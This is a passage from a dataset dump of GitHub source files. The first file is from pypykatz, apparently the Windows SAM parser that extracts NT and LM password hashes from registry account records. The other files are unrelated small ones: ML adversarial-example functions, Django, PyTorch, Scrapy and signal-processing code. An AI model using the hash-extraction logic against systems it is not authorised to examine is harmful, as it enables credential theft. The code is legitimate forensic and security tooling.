'little', signed = False)\n\t\tdf.min_pw_length = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.pw_history_length = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.lockout_treshold = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.unk3 = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.server_state = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tdf.server_role = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.uas_compatibility_req = int.from_bytes(buff.read(2), 'little', signed = False)\n\t\tdf.unk4 = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\t\n\t\tpos = buff.tell()\n\t\tmarker = buff.read(1)\n\t\tbuff.seek(pos,0)\n\t\tif marker == b'\\x01':\n\t\t\tdf.key_0 = SAM_KEY_DATA.from_buffer(buff)\n\t\telif marker == b'\\x02':\n\t\t\tdf.key_0 = SAM_KEY_DATA_AES.from_buffer(buff)\n\t\treturn df\n\t\t\n\tdef __str__(self):\n\t\tt = '== DOMAIN_ACCOUNT_F ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n\t\t\nclass SAM_KEY_DATA:\n\tdef __init__(self):\n\t\tself.revision = None\n\t\tself.length = None\n\t\tself.salt = None\n\t\tself.key = None\n\t\tself.checksum = None\n\t\tself.reserved = None\n\t\n\t@staticmethod\n\tdef from_bytes(data):\n\t\treturn SAM_KEY_DATA.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tsk = SAM_KEY_DATA()\n\t\tsk.revision = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.length = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.salt = buff.read(16)\n\t\tsk.key = buff.read(16)\n\t\tsk.checksum = buff.read(16)\n\t\tsk.reserved = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\treturn sk\n\t\t\n\tdef __str__(self):\n\t\tt = '== SAM_KEY_DATA ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n\t\t\nclass SAM_KEY_DATA_AES:\n\tdef __init__(self):\n\t\tself.revision = None\n\t\tself.length = None\n\t\tself.checksum_length = None\n\t\tself.data_length = None\n\t\tself.salt = None\n\t\tself.data = None\n\t\n\t@staticmethod\n\tdef from_bytes(data):\n\t\treturn SAM_KEY_DATA_AES.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tsk = SAM_KEY_DATA_AES()\n\t\tsk.revision = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.length = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.checksum_length = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.data_length = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.salt = buff.read(16)\n\t\tsk.data = buff.read(sk.data_length)\n\t\treturn sk\n\t\t\n\tdef __str__(self):\n\t\tt = '== SAM_KEY_DATA_AES ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n\t\t\nclass USER_ACCOUNT_V:\n\tdef __init__(self):\n\t\tself.Unknown = None \n\t\tself.NameOffset = None \n\t\tself.NameLength = None \n\t\tself.Unknown2 = None \n\t\tself.FullNameOffset = None \n\t\tself.FullNameLength = None \n\t\tself.Unknown3 = None \n\t\tself.CommentOffset = None \n\t\tself.CommentLength = None \n\t\tself.Unknown31 = None \n\t\tself.UserCommentOffset = None \n\t\tself.UserCommentLength = None \n\t\tself.Unknown4 = None \n\t\tself.Unknown5 = None \n\t\tself.HomeDirOffset = None \n\t\tself.HomeDirLength = None \n\t\tself.Unknown6 = None \n\t\tself.HomeDirConnectOffset = None \n\t\tself.HomeDirConnectLength = None \n\t\tself.Unknown7 = None \n\t\tself.ScriptPathOffset = None \n\t\tself.ScriptPathLength = None \n\t\tself.Unknown8 = None \n\t\tself.ProfilePathOffset = None \n\t\tself.ProfilePathLength = None \n\t\tself.Unknown9 = None \n\t\tself.WorkstationsOffset = None \n\t\tself.WorkstationsLength = None \n\t\tself.Unknown10 = None \n\t\tself.HoursAllowedOffset = None \n\t\tself.HoursAllowedLength = None \n\t\tself.Unknown11 = None \n\t\tself.Unknown12 = None \n\t\tself.LMHashOffset = None \n\t\tself.LMHashLength = None \n\t\tself.Unknown13 = None \n\t\tself.NTHashOffset = None \n\t\tself.NTHashLength = None \n\t\tself.Unknown14 = None \n\t\tself.Unknown15 = None \n\t\tself.Data = None\n\t\t\n\t\tself.name = None\n\t\tself.fullname = None\n\t\tself.comment = None\n\t\tself.usercomment = None\n\t\tself.homedir = None\n\t\tself.homedir_connect = None\n\t\tself.script_path = None\n\t\tself.profile_path = None\n\t\tself.workstations = None\n\t\tself.hoursallowed = None\n\t\tself.LM_hash = None\n\t\tself.NT_hash = None\n\t\t\n\t@staticmethod\n\tdef from_bytes(data):\n\t\treturn USER_ACCOUNT_V.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tuac = USER_ACCOUNT_V()\t\t\n\t\tuac.Unknown = buff.read(12) \n\t\tuac.NameOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.NameLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown2 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.FullNameOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.FullNameLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown3 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.CommentOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.CommentLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown31 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.UserCommentOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.UserCommentLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown4 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown5 = buff.read(12) \n\t\tuac.HomeDirOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.HomeDirLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown6 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.HomeDirConnectOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.HomeDirConnectLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown7 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.ScriptPathOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.ScriptPathLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown8 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.ProfilePathOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.ProfilePathLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown9 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.WorkstationsOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.WorkstationsLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown10 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.HoursAllowedOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.HoursAllowedLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown11 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown12 = buff.read(12) \n\t\tuac.LMHashOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.LMHashLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown13 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.NTHashOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.NTHashLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown14 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown15 = buff.read(24)\n\t\tdata_offset = buff.tell()\n\t\t\n\t\tif uac.NameLength > 0:\n\t\t\tbuff.seek(data_offset +uac.NameOffset)\n\t\t\tuac.name = buff.read(uac.NameLength).decode('utf-16-le')\n\t\t\n\t\tif uac.FullNameLength > 0:\n\t\t\tbuff.seek(data_offset +uac.FullNameOffset)\n\t\t\tuac.fullname = buff.read(uac.FullNameLength).decode('utf-16-le')\n\t\tif uac.CommentLength > 0:\n\t\t\tbuff.seek(data_offset +uac.CommentOffset)\n\t\t\tuac.comment = buff.read(uac.CommentLength).decode('utf-16-le')\n\t\tif uac.UserCommentLength > 0:\n\t\t\tbuff.seek(data_offset +uac.UserCommentOffset)\n\t\t\tuac.usercomment = buff.read(uac.UserCommentLength).decode('utf-16-le')\n\t\tif uac.HomeDirLength > 0:\n\t\t\tbuff.seek(data_offset +uac.HomeDirOffset)\n\t\t\tuac.homedir = buff.read(uac.HomeDirLength).decode('utf-16-le')\n\t\tif uac.HomeDirConnectLength > 0:\n\t\t\tbuff.seek(data_offset +uac.HomeDirConnectOffset)\n\t\t\tuac.homedir_connect = buff.read(uac.HomeDirConnectLength).decode('utf-16-le')\n\t\t\n\t\tif uac.ScriptPathLength > 0:\n\t\t\tbuff.seek(data_offset +uac.ScriptPathOffset)\n\t\t\tuac.script_path = buff.read(uac.ScriptPathLength).decode('utf-16-le')\n\t\tif uac.ProfilePathLength > 0:\n\t\t\tbuff.seek(data_offset +uac.ProfilePathOffset)\n\t\t\tuac.profile_path = buff.read(uac.ProfilePathLength).decode('utf-16-le')\n\t\tif uac.WorkstationsLength > 0:\n\t\t\tbuff.seek(data_offset +uac.WorkstationsOffset)\n\t\t\tuac.workstations = buff.read(uac.WorkstationsLength).decode('utf-16-le')\n\t\tif uac.HoursAllowedLength > 0:\n\t\t\tbuff.seek(data_offset +uac.HoursAllowedOffset)\n\t\t\tuac.hoursallowed = buff.read(uac.HoursAllowedLength)\n\t\t\n\t\tif uac.NTHashLength > 0:\n\t\t\tbuff.seek(data_offset + uac.NTHashOffset + 2)\n\t\t\tif buff.read(1) == b'\\x01':\n\t\t\t\tif uac.NTHashLength == 20:\n\t\t\t\t\tbuff.seek(data_offset + uac.NTHashOffset)\n\t\t\t\t\tuac.NT_hash = SAM_HASH.from_bytes(buff.read(uac.NTHashLength))\n\t\t\t\t\n\t\t\t\tif uac.LMHashLength == 20:\n\t\t\t\t\tbuff.seek(data_offset + uac.LMHashOffset)\n\t\t\t\t\tuac.LM_hash = SAM_HASH.from_bytes(buff.read(uac.LMHashLength))\n\t\t\n\t\t\telse:\n\t\t\t\tif uac.LMHashLength == 24:\n\t\t\t\t\tbuff.seek(data_offset + uac.LMHashOffset)\n\t\t\t\t\tuac.LM_hash = SAM_HASH_AES.from_bytes(buff.read(uac.LMHashLength))\n\t\t\t\t\n\t\t\t\tbuff.seek(data_offset +uac.NTHashOffset)\n\t\t\t\tuac.NT_hash = SAM_HASH_AES.from_bytes(buff.read(uac.NTHashLength))\n\t\t\t\t\n\t\treturn uac\n\t\t\n\tdef __str__(self):\n\t\tt = '== USER_ACCOUNT_V ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n\t\t\n\t\t\nclass SAM_HASH:\n\tdef __init__(self):\n\t\tself.pekID = None\n\t\tself.revision = None\n\t\tself.hash = None\n\t\n\t@staticmethod\n\tdef from_bytes(data):\n\t\treturn SAM_HASH.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tsk = SAM_HASH()\n\t\tsk.pekID = int.from_bytes(buff.read(2), 'little', signed = False) \n\t\tsk.revision = int.from_bytes(buff.read(2), 'little', signed = False) \n\t\tsk.hash = buff.read(16)\n\t\treturn sk\n\t\t\n\tdef __str__(self):\n\t\tt = '== SAM_HASH ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n\t\t\nclass SAM_HASH_AES:\n\tdef __init__(self):\n\t\tself.pekID = None\n\t\tself.revision = None\n\t\tself.data_offset = None\n\t\tself.salt = None\n\t\tself.data = None\n\t\n\t@staticmethod\n\tdef from_bytes(data):\n\t\treturn SAM_HASH_AES.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tsk = SAM_HASH_AES()\n\t\tsk.pekID = int.from_bytes(buff.read(2), 'little', signed = False) \n\t\tsk.revision = int.from_bytes(buff.read(2), 'little', signed = False) \n\t\tsk.data_offset = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.salt = buff.read(16)\n\t\tsk.data = buff.read()\n\t\treturn sk\n\t\t\n\tdef __str__(self):\n\t\tt = '== SAM_HASH_AES ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/registry/sam/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":13487,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"28438883033","text":"from math import cos\nfrom random import random\n\nnumR = lambda: cos(random())\n\ndef printMat(mat, tex = ''):\n print(f'\\n {tex}')\n for m in mat: \n p = ''\n for n in m: p += f' {n} '\n print(f\"{p}\")\n\ndef validateN(n):\n try:\n n = int(n)\n return n\n except:\n print('Dato no valido')\n exit()\n\ndef addData(n, n2 = 0):\n data = []\n count = 0\n while count < n:\n data.append(n2)\n count += 1\n return data\n","repo_name":"hecdelatorre/neuralNetwork","sub_path":"functions2.py","file_name":"functions2.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17607888654","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 16 10:31:29 2019\n\n@author: Arash Rahnama\n\"\"\"\nimport torch\n###############################################################################\n# Fast Gradient Sign Method\ndef fgsm(net, x, y, loss_criterion, eps):\n # compute gradient for data\n x.requires_grad = True\n preds = net(x)\n net.zero_grad()\n loss = loss_criterion(preds, y)\n loss.backward()\n x_grad = x.grad\n # get the element-wise sign of gradient\n signed_x_grad = x_grad.sign()\n # create the adversarial input\n adv_x = x + (eps*signed_x_grad)\n return adv_x\n############################################################################### \n# Projected Gradient Descent Method\ndef pgdm(net, x, y, loss_criterion, eps, steps, radius):\n # perturbations \n pgd = x.new_zeros(x.shape)\n # create the adversarial input\n adv_x = x + pgd\n for step in range(steps):\n pgd = pgd.detach()\n x = x.detach()\n # compute gradient for data\n adv_x = adv_x.clone().detach()\n adv_x.requires_grad = True\n preds = net(adv_x)\n net.zero_grad()\n loss = loss_criterion(preds, y)\n loss.backward(create_graph=False, retain_graph=False)\n adv_x_grad = adv_x.grad\n # get the element-wise sign of gradient\n signed_adv_x_grad = adv_x_grad.sign()\n # create the adversarial input\n pgd = pgd + (eps*signed_adv_x_grad)\n pgd = torch.clamp(pgd, -radius, radius)\n adv_x = x + pgd\n return adv_x\n###############################################################################\n","repo_name":"ArashRahnama/AdversarialDetection","sub_path":"adversarial/attacks.py","file_name":"attacks.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"345163245","text":"from django.contrib import admin\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import send_mail\nfrom django.urls import reverse\n\nfrom .models import Customer, Event, EventImage\n\n\ndef sent_invitation_email(self, request, queryset):\n \"\"\"Sending invitation email to selected customers\"\"\"\n\n for customer in queryset:\n domain = get_current_site(request).domain\n link = reverse('event_booker:confirm-booking', kwargs={'uuid_': customer.uuid})\n link = 'http://' + domain + link\n email_subject = f' {customer.event.name} booking confirmation.'\n email_send_from = 'no-reply@eventer.com'\n email_body = f'Dear {customer.name} {customer.surname},\\n \\n\\tPlease kindly confirm your attendance to an Event ' \\\n f'\"{customer.event.name}\" \\non {customer.event.date} by following the link below: \\n' \\\n f'{link} .\\n\\n' \\\n f'Kind Regards, \\n' \\\n f'Admin - EvEnter'\n\n send_mail(email_subject,\n email_body,\n email_send_from,\n [customer.email],\n fail_silently=False)\n customer.invited = True\n customer.save()\n\n\nclass CustomerAdmin(admin.ModelAdmin):\n list_display = ['name', 'surname', 'email', 'event']\n actions = [sent_invitation_email, ]\n\n\nclass EventImageInLine(admin.TabularInline):\n model = EventImage\n\n\n@admin.register(Event)\nclass EventCustomer(admin.ModelAdmin):\n inlines = [\n EventImageInLine,\n ]\n\n\nadmin.site.register(Customer, CustomerAdmin)\nadmin.site.register(EventImage)\n","repo_name":"leszekgrechowicz/Event_Booker","sub_path":"event_booker/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37181913000","text":"import torch\n\nclass FeedForwardClassifier(torch.nn.Module):\n def __init__(self, input_size, output_size, hidden_size,\n num_hidden_layers, dropout_prob = None):\n super(FeedForwardClassifier, self).__init__() \n if dropout_prob is not None:\n self.dropout = torch.nn.Dropout(dropout_prob)\n else:\n self.dropout = None\n self.initial_layer = torch.nn.Linear(input_size, hidden_size)\n self.hidden_layers = [torch.nn.Linear(hidden_size, hidden_size)\n for i in range(num_hidden_layers)]\n self.final_layer = torch.nn.Linear(hidden_size, output_size)\n\n def _apply_dropout(self, vec):\n if self.dropout is not None:\n return self.dropout(vec).float()\n else:\n return vec\n\n def forward(self, input_vec, labels):\n nextout = input_vec\n nextout = self._apply_dropout(nextout)\n nextout = self.initial_layer(nextout)\n nextout = nextout.clamp(min=0)\n for layer in self.hidden_layers:\n nextout = self._apply_dropout(nextout)\n nextout = layer(nextout)\n nextout = nextout.clamp(min=0)\n nextout = self._apply_dropout(nextout)\n nextout = self.final_layer(nextout)\n result = nextout\n loss = None\n if labels is not None:\n loss_fct = torch.nn.CrossEntropyLoss()\n y = torch.LongTensor(labels[:len(labels)]) \n loss = loss_fct(result, y)\n return result, loss\n \n @staticmethod\n def create_factory_method(config):\n assert(config['name'] == 'feedforward')\n hidden_size = config['hiddensize']\n num_hidden_layers = config['numlayers']\n if 'dropout' in config:\n dropout_prob = config['dropout']['prob']\n else:\n dropout_prob = None\n return lambda x, y: FeedForwardClassifier(x, y, hidden_size, \n num_hidden_layers,\n dropout_prob)\n \n ","repo_name":"Mark-Hopkins-at-Williams/bigsky","sub_path":"bigsky/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41511817654","text":"from ast import Not\nimport imp\nfrom string import ascii_letters\nimport scrapy\nfrom scrapy import Request\nimport json\nfrom scrapy.crawler import CrawlerProcess\nclass CnbcSpider(scrapy.Spider):\n name = 'cnbc'\n allowed_domains = ['cnbc.com']\n start_urls = ['https://www.cnbc.com/cybersecurity']\n pagenumber=1\n def parse(self, response):\n div=response.xpath(\"//*[@data-test='Card']/div/div\")\n for x in div:\n url=x.xpath(\"./div[1]//a[contains(@class,'Card-title')]/@href\").extract_first()\n tittle=x.xpath(\"./div[1]//a[contains(@class,'Card-title')]//text()\").extract()\n Date=x.xpath(\"./div[2]/span/text()\").extract()\n \n yield response.follow(url,callback=self.parse_detail,meta={\"Url\":url,\"title\":tittle,\"Date\":Date})\n\n\n\n next_page='https://www.cnbc.com/cybersecurity/?page='+str(CnbcSpider.pagenumber)\n\n if CnbcSpider.pagenumber <7 :\n #spider sınıfında pagenumber diye bir değişken oluşturuldu\n #1 den başlayan sayfa sayısı 6.sayfaya kadar çalışacak\n #bir sonraki sayfa için bu yöntemi kullanmamdaki sebeb bu web sitesinde sayfa sayısı sonsuz artabiliyor ve hata vermiyor.\n \n CnbcSpider.pagenumber += 1\n link=response.urljoin(next_page)\n yield scrapy.Request(url=link,callback=self.parse)\n \n \n print(CnbcSpider.page)\n def parse_detail(self,response):\n url=response.meta.get(\"Url\")\n title=response.meta.get(\"title\")\n Date=response.meta.get(\"Date\")\n # that method cant get all value because some contect's paragraph attirbuts.\n contect=response.xpath(\"//*[contains(@class,'ClipPlayer-clipPlayerIntroSummary')]//text()\").extract()\n \n if not contect:\n #boolean methodu contect=False anlamına geliyor . bu bir boş list olduğunu belirtir. \n #listelerin boş olmasını kontrol etmek için başka kodlarda vardır len(contect) gibi .\n contect=response.xpath(\"//div[contains(@class,'group')]//p/text()\").extract()\n with open(\"cnbc.json\",\"a\",encoding=\"utf-8\")as f:\n f.write(json.dumps({\"title\":title,\"url\":url,\"Date\":Date,\"content\":contect,\"language\":\"EN\"},indent=2,ensure_ascii=False)) \n f.close() \nproces=CrawlerProcess()\nproces.crawl(CnbcSpider)\nproces.start() ","repo_name":"MustafaDnmez/Scrapy-ile-haber-metini-cekme","sub_path":"cybercrawl/spiders/cnbc.py","file_name":"cnbc.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5675871730","text":"from django.urls import path, include\nfrom rest_framework import routers\n\nfrom . import views\nfrom . import viewsets\n\nrouter = routers.DefaultRouter()\nrouter.register('users', viewsets.UserViewSet)\nrouter.register('alerts', viewsets.AlertViewSet, basename='alert')\n\nalert_retrieve = viewsets.AlertViewSet.as_view({\n 'get': 'retrieve'\n})\napp_name = 'prime'\nurlpatterns = [\n path('', views.index, name='index'),\n path('register/', views.RegisterView.as_view(), name='register'),\n # Urls for web users\n path('create/alert/', views.AlertCreate.as_view(), name='alerts_create'),\n path('update/alert//', views.AlertUpdate.as_view(), name='alerts_update'),\n path('delete/alert//', views.AlertDelete.as_view(), name='alerts_delete'),\n\n path('', include((router.urls, 'alerts'), namespace='alerts'))\n]\n","repo_name":"aberrier/crypto-api-back","sub_path":"crypto/prime/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18230064073","text":"from django_extensions.db.fields import AutoSlugField\nfrom django_extensions.db.models import TimeStampedModel\nfrom django.db.models import CharField, ForeignKey, TextField, PROTECT\nfrom django.utils.translation import gettext_lazy as _\n\nfrom fields import NameMixin, VisibilityMixin\nfrom images.fields import ImageField\n\n\nclass Profile(NameMixin, TimeStampedModel, VisibilityMixin):\n class Meta:\n verbose_name = _(\"Actor profile\")\n verbose_name_plural = _(\"Actor profiles\")\n\n alias = CharField(\n blank=True,\n max_length=63,\n null=True,\n help_text=_(\"artistAliasHelpText\"),\n verbose_name=_(\"Artist alias\"),\n )\n slug = AutoSlugField(_(\"Slug\"), overwrite=True, populate_from=\"name\")\n about = TextField()\n group = ForeignKey(\n \"ProfileGroup\",\n blank=True,\n null=True,\n on_delete=PROTECT,\n related_name=\"profiles\",\n )\n avatar = ImageField(\n blank=True, null=True, upload_to=\"var/avatars\", verbose_name=_(\"Avatar\"),\n )\n\n def __str__(self):\n if self.alias:\n return \"%s (%s)\" % (self.alias, self.name)\n return super().__str__()\n","repo_name":"just-paja/polocas-napadu-api","sub_path":"profiles/models/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26268889727","text":"\"\"\"\r\nTO-DO:\r\n 4. Describe the spectrum of the AM DSB-SC signal\r\nDONE:\r\n 1. Calculate and print Fs and Ts\r\n 2. Plot the information signal, carrier signal and the AM DSB-SC signal in one plot\r\n 3. Plot the two sided and single sided spectrum of AM DSB-SC signal\r\n 5. Calculate and print the following:\r\n 1. Maximum AM DSB-SC amplitude\r\n 2. Minimum AM DSB-SC amplitude\r\n 3. Average normalized of power carrier signal\r\n 4. Average normalized of power informaion signal\r\n 5. Average normalized of power AM DSB-SC signal\r\n 6. Power output\r\n 7. Information signal bandwidth\r\n 8. AM DSB-SC signal bandwidth\r\n\"\"\"\r\n\r\n\r\n# Import modules to use\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nfrom numpy import arange, cos, linspace, pi, sin, sinc, split\r\nfrom scipy.fftpack import fft, fftshift\r\n\r\n\r\nplot_colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',\r\n '#9467bd', '#8c564b', '#e377c2', '#7f7f7f',\r\n '#bcbd22', '#17becf']\r\n\r\n\r\ndef make_single_side_spectrum(spectrum):\r\n return split(spectrum, 2)[-1]\r\n\r\n\r\ndef anp(signal):\r\n return pow(signal, 2)/2\r\n\r\n\r\ndef main(scenario_number, isa, isf, csa, csf):\r\n print(f'Scenario:\\t{scenario_number}')\r\n isp = 1 / isf # information period\r\n csp = 1 / csf # carrier period\r\n\r\n max_frequency = max(csf, isf)\r\n min_frequency = min(csf, isf)\r\n max_period = max(csp, isp)\r\n nyquist_frequency = 2*max_frequency\r\n Tmax = 3*max_period\r\n\r\n # 1. Calculate and print Fs and Ts\r\n Fs = float(min_frequency*nyquist_frequency)\r\n Ts = float(1/Fs)\r\n print(f'Fs:\\t{Fs}')\r\n print(f'Ts:\\t{Ts}')\r\n\r\n t = linspace(0, Tmax, round(Tmax/Ts))\r\n\r\n i_omega = 2 * pi * isf\r\n c_omega = 2 * pi * csf\r\n\r\n i_signal = isa * cos(i_omega * t)\r\n c_signal = csa * cos(c_omega * t)\r\n\r\n m = isa/csa\r\n am_dsb_sc = i_signal*c_signal\r\n\r\n u_band = i_signal * csa\r\n l_band = -u_band\r\n\r\n ts = len(t)\r\n s_fft = fft(am_dsb_sc)\r\n ns_fft = abs(s_fft) / ts\r\n fs_fft = fftshift(ns_fft)\r\n if ts % 2 == 0:\r\n f_range = linspace(-ts/2, ts/2-1, ts)\r\n else:\r\n f_range = linspace(-(ts - 1)/2, (ts - 1)/2, ts)\r\n Duration = ts*Ts\r\n f_range *= (1 / Duration)\r\n\r\n end_frequency_range_limit = csf + 3 * isf\r\n end_frequency_range_ticks = int(end_frequency_range_limit/1000)\r\n\r\n # 1. Maximum AM DSB-SC amplitude\r\n sa_max = int(max(am_dsb_sc))\r\n print(f'Maximum AM DSB-SC amplitude:\\t{sa_max}')\r\n\r\n # 2. Minimum AM DSB-SC amplitude\r\n sa_min = int(min(am_dsb_sc))\r\n print(f'Minimum AM DSB-SC amplitude:\\t{sa_min}')\r\n\r\n # 3. Average normalized of power carrier signal\r\n c_anp = anp(csa)\r\n print(f'Average normalized power of carrier signal:\\t{c_anp}')\r\n\r\n # 4. Average normalized of power informaion signal\r\n i_anp = anp(isa)\r\n print(f'Average normalized power of information signal:\\t{i_anp}')\r\n\r\n # 5. Average normalized of power AM DSB-SC signal\r\n am_anp = anp(max(am_dsb_sc))\r\n print(f'Average normalized power of AM DSB-SC signal:\\t{am_anp}')\r\n\r\n # 6. Power output\r\n power_output = round(pow(m, 2) / (2 + pow(m, 2)), 1)\r\n print(f'Power output:\\t{power_output}')\r\n\r\n # 7. Information signal bandwidth\r\n i_bandwidth = isf\r\n print(f'Information signal bandwidth:\\t{i_bandwidth}')\r\n\r\n # 8. AM DSB-SC signal bandwidth\r\n s_bandwidth = 2*isf\r\n print(f'AM DSB-SC signal bandwidth:\\t{s_bandwidth}')\r\n\r\n return am_anp\r\n\r\n\r\n\"\"\"\r\n # 2. Plot the information signal, carrier signal and the AM DSB-SC signal in one plot\r\n subplot_rows, subplot_columns = 3, 1\r\n plt.figure(1)\r\n\r\n plt.subplot(subplot_rows, subplot_columns, 1)\r\n plt.plot(t, i_signal, plot_colors[0])\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.xlabel('Time (seconds)')\r\n plt.ylabel('Amplitude (volts)')\r\n plt.title('Information signal')\r\n\r\n plt.subplot(subplot_rows, subplot_columns, 2)\r\n plt.plot(t, c_signal, plot_colors[0])\r\n plt.grid()\r\n plt.tight_layout()\r\n 